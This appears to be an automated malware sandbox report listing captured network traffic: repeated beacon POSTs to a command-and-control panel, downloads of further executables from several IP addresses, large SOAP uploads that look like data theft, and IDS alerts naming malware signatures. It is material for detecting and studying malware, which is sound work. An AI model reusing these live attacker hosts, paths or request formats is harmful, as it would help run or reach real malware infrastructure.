                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062370001&unit=246122658369
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 103.84.89.222:33791Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 103.84.89.222:33791Content-Length: 2326018Expect: 100-continueAccept-Encoding: gzip, deflate
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 103.84.89.222:33791Content-Length: 2326010Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062371001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                            Source: Joe Sandbox ViewIP Address: 185.215.113.97 185.215.113.97
                            Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57264 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57266 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57269 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57267 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57274 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57277 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57271 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57273 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57279 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57361 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57330 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57362 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57365 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57364 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57366 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57368 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57367 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57371 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57369 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57373 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57376 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57370 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57374 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57372 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57377 -> 172.67.181.203:443
